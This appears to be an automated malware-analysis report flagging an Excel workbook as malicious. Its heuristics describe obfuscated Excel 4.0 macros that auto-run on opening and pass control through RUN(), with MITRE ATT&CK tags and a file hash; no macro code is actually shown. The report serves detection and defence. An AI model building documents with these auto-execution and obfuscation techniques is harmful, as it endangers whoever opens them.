MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The critical heuristics indicate the presence of obfuscated Excel 4.0 macros with an Auto_Open execution chain. The macro script contains a RUN command, which is likely used to execute a downloaded payload. The obfuscated nature and the Auto_Open entry suggest a malicious document designed to execute arbitrary code upon opening.
Heuristics (3)
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- Obfuscated XLM Auto_Open execution chain (critical, OLE_XLM_OBFUSCATED_AUTOEXEC_CHAIN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and an obfuscated formula execution chain. The macro builds strings through FORMULA(CHAR(...)), primes state with SET.VALUE / GET.CELL / GOTO, and transfers control through RUN(). This is a high-confidence XLM malware pattern.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 128222 bytes |

SHA-256: 7f83366941e29dca365fe5c9c10b481f5fae1ef6cce63bd979cbf4d1c662017b
Preview script: first 1,000 lines of the extracted script